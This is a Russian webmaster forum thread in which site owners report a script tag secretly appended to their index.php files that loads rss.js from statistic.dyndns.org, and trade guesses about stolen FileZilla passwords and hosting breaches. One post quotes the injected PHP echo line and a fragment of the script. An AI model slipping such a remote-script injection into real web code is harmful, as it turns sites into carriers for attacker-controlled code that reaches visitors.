- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
На некоторых своих сайтах только что заметил код внизу страницы после закрытия всех тегов (при открытии исходного кода страницы):
или
Понять не могу что это. При открытии http://stat.dontexist.com/rss.js показывает пустой файл. Поиск в php кодах сайта по запросу statistic.dyndns.org ничего не дал. Странно.
При открытии http://stat.dontexist.com/rss.js показывает пустой файл.
Какая операционка и стоит ли антивирус? Посмотри без антивируса под линухом, через SSH или в винде, но в "песочнице", все увидишь..
Поиск в php кодах сайта по запросу statistic.dyndns.org ничего не дал. Странно.
Как правило в зашифрованном виде это дело прописывается
Исправил. Вчера взломали похоже.
Какая операционка и стоит ли антивирус? Посмотри без антивируса под линухом, через SSH или в винде, но в "песочнице", все увидишь..
Операционка винда + нод32. Как под линуксом то посмотреть его... результат такой же как в винде. FireBug тож результатов не дает. Че за бредовый взлом.
можно в базе поискать, у меня так было. Хитрожопые дописывали скрипты к конец каждой новости. Никак найти не мог)
Возникла мысль.... а не смс баннеры ли таким образом распространяют.
1. Заразили кучу сайтов js файлами
2. пока ниче в нем не прописывают
3. настает время XXX, прописывают туда вредоносный код для загрузки файла с вирусом и вуаля ваши сайты становятся разносчиком заразы :)
Он в конце файла index.php
Столкнулся с такой же ситуацией.
echo '<script src="http://statistic.dyndns.org/rss.js"></script>';
?>
от 134.255.241.125
Вот код
document.getElementById("pftgfkzif").innerHTML = text ;
Занятно, банит, если обращений несколько и при последующих файлы пустые.
Дописался во все индексы сайтов, которые у меня были в закладках файлзиллы, в одном случае похерил весь код. Хостингов (компаний) там было 2, так что похоже от меня (хотя не все сайты я даже открывал)
Кто то вылавливал причину?
5 сайтов на сервере все заражены, этой херней, кто как лечил ? Не могу найти концы, все файлы прочисал, результат 0. Хелп плиз.
Сори тупанул искал в шаблоне , казалось индексный файл в корне лежал.
ПС. Есть мысль что на компе был трой который украл пасы из FileZilla у кого нить еще стоит FileZilla ? Тк у меня не один серв оказался заражен.
5 сайтов на сервере все заражены, этой херней.
Тут от "херни" вряд-ли помогут. Пиши, что говорит антивирус для начала, что делал, чтобы вылечить. Пробовал из бэкапа залить измененные файлы?
Обнаружил кто, как произошло заражение? Просто у меня несколько сайтов были заражены, все они на 1 хостинге (разные аккаунты). Один сайт без CMS и ломать там нечего (даже БД нету).... Я грешу на моего хостера, т.к. однажды его уже ломали и также было массовое заражение.